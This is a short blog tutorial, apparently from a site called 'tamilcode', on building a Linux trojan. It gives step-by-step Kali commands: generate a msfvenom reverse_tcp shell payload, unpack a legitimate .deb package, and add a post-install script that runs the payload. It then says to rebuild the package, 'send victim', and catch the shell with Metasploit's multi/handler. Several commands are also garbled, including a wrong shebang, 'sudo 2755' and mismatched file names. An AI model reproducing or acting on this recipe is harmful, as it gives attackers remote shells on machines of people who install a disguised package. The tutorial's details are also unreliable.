torjan tamilcode

                  WELCOME TO TAMILCODE

HERE IS TRICKS AND TECHNOLOGY


VIEDO FOR VISUAL LEANER







ABOUT TROJAN

Trojan  is malware which hide malware file into  original file but  it look like a original file it work like backdoor  it is a story between the two country ..... 


TORJAN STORY BETWEEN THE TWO COUNTRY .....


இரண்டு நாடுகள் உள்ளன, ஒன்று மிகவும் வலிமையான 
நாடு மற்றும் நங்கூரம் பலவீனமான நாடுவலுவான நாடு 
போருக்கு வந்தபோது பலவீனமான நாடு ட்ரோஜன்
ஹார்ஸை உருவாக்குகிறதுசிக்கலைத் தீர்க்க வலுவான நாட்டை
அனுப்புங்கள், ஆனால் டோர்ஜன் ஹார்ஸில் 40 வலிமையானவை
வீரர்கள் அங்கே இரவில் அவர்கள் நாட்டை அழிக்கிறார்கள்



So you can understand story which has been written above 

based on the above story the trojan has been created ......

so now we going to created the torjan using reverse engineering 

method


REVERSE ENGINEERING METHOD



so we going create the Trojan for linux based system  


                     KALI LINUX COMMANDS



STEP 1    create the folder (Trojan) in desktop




STEP 2   download any Debian application from your browser

(deb file )


STEP 3   now create payload using msfvenom  for linux


STEP 4   msfvenom -p linux/x64/shell/reverse_tcp LHOST=your ip LPORT=8080 -f elf > trojan.shell



STEP 5  mkdir foldername

FOR CREATE THE NEW FOLDER




STEP 6  dpkg -x filename.deb foldername

ex : dpkg -x cyberfox.deb trojan







STEP 7   cd usr


STEP 8   mkdir DEBIAN


STEP 9   type nano control




STEP 10 in the control page type the command below

package: cyberfox
version: 90.1
section: software
priority: optional
architecture: amd64
maintainer: ubuntu
description: it is great tool




STEP 11  cut the payload and paste in usr folder (which located in torjan folder)



STEP 12  in debian folder type nano postinsta



COPY AND PASTE THE COMMANDS IN FILE

# !/bash/bin

sudo 2755 /usr/torjan.elf && /usr/torjan.elf &






STEP 13  chmod 775 postinsta


STEP 14  dpkg-deb -b foldername





NOW YOUR TROJAN IS READY SEND VICTIM


open the metasploit using msfvenom


use exploit/multi/handler


set payload linux/x64/shell/reverse_tcp


show options


set lhost yourip


set lport 8080


run




I HOPE YOU WILL UNDERSTAND AND PLEASE SUBSCRIBE TAMILCODE


Post a Comment

0 Comments